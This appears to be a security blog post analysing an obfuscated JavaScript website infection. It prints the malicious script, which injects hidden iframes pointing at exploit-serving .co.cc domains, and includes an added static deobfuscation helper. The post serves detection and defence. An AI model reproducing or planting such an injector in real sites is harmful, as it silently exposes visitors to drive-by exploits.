The latest website infection

We’re seeing more and more obfuscated JavaScript infections recently.

The latest one:


y='rum';n='s';fp='afe';e='tp';bo='/f';lk='o.c';bl='742';x='7';i='ra';h='c';gf='.';
fl='ht';q='//';w='c';pu='554';mk='p?';qg='tp=';il='ph';yy='o';am='5e';k='.c';c='me';
u='r';d='20a';qd='1';z='prw';xu='if';iy='a';f=':';a=xu.concat(i,c);kx=n.concat
(u,h);l=fl.concat(e,f,q,z,qd,k,lk,w,bo,yy,y,gf,il,mk,qg,bl,d,am,pu,fp,iy,x);var
ov=document.createElement(a);ov.setAttribute('width','5');ov.setAttribute
('height','5');ov.setAttribute('style','display:none');ov.setAttribute
(kx,l);document.body.appendChild(ov);lb='r';r='d3b';q='.c';b='or';v='e';
bi='e30';gl='?';j='c/f';ru='l';pj='a';zh='m.';h='a';xc='me';i='c';z='tp:';n='4';ye='=';
lg='s';qk='426';jp='ht';g='a';k='z';ut='u';c='//p';pr='7f';o='i';by='fr';ck='3';pl='php';
pe='tp';e='a';nc='.co';gz=o.concat(by,h,xc);kx=lg.concat(lb,i);dv=jp.concat
(z,c,k,ru,ck,nc,q,j,b,ut,zh,pl,gl,pe,ye,v,pj,r,e,qk,pr,bi,g,n);var bo=document.createElement(gz);
bo.setAttribute('width','5');bo.setAttribute('height','5');bo.setAttribute('style','display:none');
bo.setAttribute(kx,dv);document.body.appendChild(bo);

deobfuscates to:

iframe setAttribute src = hxxp://prw1.co.cc/forum.php?tp=74220a5e554afea7

and:

iframe setAttribute src = hxxp://pzl3.co.cc/forum.php?tp=ead3ba4267fe30a4
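The deobfuscation above can be done statically, without running the script. The following is an added example, not code from the original post: it tracks the string assignments and `concat` calls and reports each injected element. The sample input is constructed with a placeholder domain, and the function name `resolveInjectedElements` is hypothetical.

```javascript
// Constructed sample in the same style as the script above (placeholder domain).
const SAMPLE =
  "a='fr';b='i';c='ame';d='sr';e='c';f='ht';g='tp:';h='//exam';i='ple.inv';" +
  "j='alid/x.php';k=b.concat(a,c);m=d.concat(e);n=f.concat\n(g,h,i,j);var " +
  "q=document.createElement(k);q.setAttribute('width','5');q.setAttribute" +
  "('style','display:none');q.setAttribute\n(m,n);document.body.appendChild(q);" +
  // Second injector reuses variable names, as the real script does.
  "h='//two.exam';n=f.concat(g,h,i,j);var r=document.createElement(k);" +
  "r.setAttribute(m,n);document.body.appendChild(r);";

// Resolve the injected elements by tracking string assignments only.
// Nothing is evaluated, so the payload never runs. Assumes no literal
// contains ';' or ',', which holds for this obfuscation style.
function resolveInjectedElements(script) {
  const vars = new Map();     // variable name -> resolved string
  const elements = new Map(); // element variable -> { tag, attrs }
  const val = (tok) => {
    const t = tok.trim();
    const lit = t.match(/^'([^']*)'$/);
    return lit ? lit[1] : vars.get(t) || '';
  };
  for (const raw of script.split(';')) {
    // Line wraps inside a statement are layout only; normalise them away.
    const stmt = raw.replace(/\s+/g, ' ').trim().replace(/^var /, '');
    let m;
    if ((m = stmt.match(/^(\w+) ?= ?'([^']*)'$/))) {
      vars.set(m[1], m[2]);
    } else if ((m = stmt.match(/^(\w+) ?= ?(\w+)\.concat ?\((.*)\)$/))) {
      vars.set(m[1], val(m[2]) + m[3].split(',').map(val).join(''));
    } else if ((m = stmt.match(/^(\w+) ?= ?document\.createElement ?\((.*)\)$/))) {
      elements.set(m[1], { tag: val(m[2]), attrs: {} });
    } else if ((m = stmt.match(/^(\w+)\.setAttribute ?\((.*),(.*)\)$/))) {
      if (elements.has(m[1])) elements.get(m[1]).attrs[val(m[2])] = val(m[3]);
    }
  }
  return [...elements.values()].map((el) => ({
    tag: el.tag,
    src: (el.attrs.src || '').replace(/^http/i, 'hxxp'), // defanged for reports
    hidden: /display\s*:\s*none/i.test(el.attrs.style || ''),
  }));
}

console.log(resolveInjectedElements(SAMPLE));
```

Because statements are processed in order, reassigned variables resolve to the value in effect at each `concat`, which is what lets one pass recover both URLs from a script that reuses names.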

Both domains, prw1.co.cc and pzl3.co.cc, are listed as suspicious by Google:

What is the current listing status for prw1.co.cc?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 5 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-04-09, and the last time suspicious content was found on this site was on 2011-04-08.
Malicious software includes 440 scripting exploit(s).

and…

What is the current listing status for pzl3.co.cc?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 4 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-04-27, and the last time suspicious content was found on this site was on 2011-04-27.
Malicious software includes 334 scripting exploit(s).

In gathering data and searching for the source of the vulnerability that leads to this infection, no common denominator has emerged among the infected websites (now totaling about 38,500).

It doesn’t appear to be WordPress or Joomla or osCommerce or any of the other popular website packages.

It might be more stolen FTP login credentials.

If you have further information on this, please post here, or email me at traef@wewatchyourwebsite.com.

Thank you.
